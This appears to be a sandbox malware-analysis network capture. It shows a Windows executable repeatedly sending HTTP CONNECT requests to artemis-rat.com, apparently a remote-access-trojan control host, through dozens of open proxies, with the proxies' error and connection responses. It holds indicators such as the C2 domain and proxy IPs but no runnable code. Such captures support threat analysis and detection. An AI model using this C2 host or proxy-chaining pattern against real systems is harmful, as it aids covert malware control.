                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1756192.168.2.554195142.54.229.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.913799047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1757192.168.2.554775103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914020061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1758192.168.2.55462441.77.188.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914716959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.351676941 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Content-Length: 597
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
Mar 11, 2024 03:30:46.391032934 CET372IN
                                                                                                                                                                                                                                                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro
Mar 11, 2024 03:30:46.767410994 CET372IN
                                                                                                                                                                                                                                                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1759192.168.2.55469147.104.0.1290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914796114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.112988949 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1760192.168.2.554898194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.915045977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.378967047 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1769192.168.2.554717113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.944574118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1770192.168.2.55483245.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.953032017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1771192.168.2.55496838.162.27.5331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986465931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.416714907 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1772192.168.2.55483837.187.77.58379203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986929893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702020884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.681914091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514621973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1773192.168.2.554854211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986929893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1774192.168.2.55070314.241.203.4656783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.987593889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1775192.168.2.554707102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.988262892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.437073946 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1776192.168.2.55479445.124.184.13803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.989629030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1777192.168.2.550687148.72.212.183450123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.990160942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1778192.168.2.554863118.218.126.5494003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.990170002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.302721024 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: Zscaler/6.2
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-length: 13597
                                                                                                                                                                                                                                                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1779192.168.2.554966159.65.245.255803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.990592003 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.468436003 CET | 442 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 281
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1780192.168.2.55477474.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.992944956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905149937 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1781192.168.2.554862208.109.14.49420723876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.017537117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.811192036 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905174017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.014712095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1782192.168.2.5548918.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.021415949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1783192.168.2.55426047.229.171.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.022675037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1784192.168.2.554881222.223.103.23273023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.022723913 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.368196011 CET | 90 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1785192.168.2.55482945.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.023823023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1786192.168.2.554894186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.023823977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1787192.168.2.55490554.37.196.18980803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.024517059 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1788192.168.2.554895194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.024518013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1789192.168.2.55491135.199.90.22588883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.024847031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.523778915 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1790192.168.2.55490143.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.024907112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1791192.168.2.554994172.67.181.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.025244951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.179805040 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1792192.168.2.554896212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.025247097 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1793192.168.2.55081382.210.56.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.025541067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207321882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.389517069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.405179024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
